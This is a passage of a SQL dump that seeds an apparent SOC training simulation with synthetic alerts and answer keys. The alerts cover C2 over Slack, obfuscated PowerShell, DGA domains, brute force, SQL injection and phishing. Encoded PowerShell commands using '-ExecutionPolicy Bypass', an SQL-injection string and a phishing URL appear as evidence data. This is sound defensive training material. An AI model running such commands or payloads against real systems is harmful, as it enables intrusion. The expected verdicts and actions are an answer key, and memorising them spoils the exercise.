4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1024, 'APT-Level C2 Communication Using Legitimate Services', 'critical', 'Splunk', 'Detected multi-hop C2 communication using Slack as a relay. Memory-only payloads detected on host.', 'Malware', 'T1090', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-17T02:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"j.doe\",\"hostname\":\"CORP-PC-01\",\"command_line\":\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\",\"domain\":\"slack.com\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain used for C2 relay\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Observed in other fileless malware attacks\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Memory-only payloads and C2 communication through Slack indicate a sophisticated attack.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1025, 'Obfuscated PowerShell Script Detected', 'high', 'SentinelOne', 'An obfuscated PowerShell command was executed, indicative of process hollowing techniques.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-17T05:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"username\":\"s.smith\",\"hostname\":\"OFFICE-LAPTOP\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell indicative of process hollowing\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands suggests an attempt to evade detection.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile 
-ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 
RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1026, 'DGA Domain Resolution Detected', 'high', 'Splunk', 'Detected DNS resolution attempts to a domain generated by a Domain Generation Algorithm (DGA).', 'Malware', 'T1568.002', 1, 'New', NULL, '{\"timestamp\":\"2026-01-17T08:10:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.3.20\",\"username\":\"admin-user\",\"hostname\":\"SERVER-01\",\"domain\":\"x3z9s8d7.example.com\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected server\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"x3z9s8d7.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DGA-based malware campaigns\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"DGA domains are commonly used by malware to evade detection and maintain C2 communication.\"}', 'Expert', 'SIEM', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1027, 'Failed Login Attempts from Suspicious Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from a foreign IP, indicative of a potential brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-17T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC\",\"failed_attempts\":25}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for failed login attempts and brute force activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user in the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"monitor_login_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts from a suspicious IP can indicate a brute force attempt.\"}', 'Expert', 'SIEM', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1028, 'SQL Injection Attempt on Public-Facing Web Server', 'critical', 'Splunk', 'Detected SQL injection payload in web request targeting a public-facing server. Potential data exfiltration risk.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-17T11:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.4.5\",\"username\":\"unknown\",\"hostname\":\"WEB-SERVER-01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Classic SQL injection payload detected\"}}],\"expected_actions\":[\"block_ip\",\"patch_vulnerability\",\"monitor_web_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempts can lead to unauthorized data access and exfiltration.\"}', 'Expert', 'SIEM', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR 
\'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1029, 'Suspicious Email Activity with Spoofed Domain', 'low', 'SentinelOne', 'Email received from a domain that appears to be spoofed, mimicking a legitimate organization.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-17T12:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"192.168.5.10\",\"username\":\"c.jones\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"support@micros0ft.com\",\"url\":\"http://malicious-link.com/reset\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP has been reported for sending phishing emails\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@micros0ft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Email domain is a known spoof of \'microsoft.com\'\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/reset\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL used in phishing campaigns\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email appeared suspicious due to the spoofed domain but no malicious activity was confirmed.\"}', 'Expert', 'SIEM', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 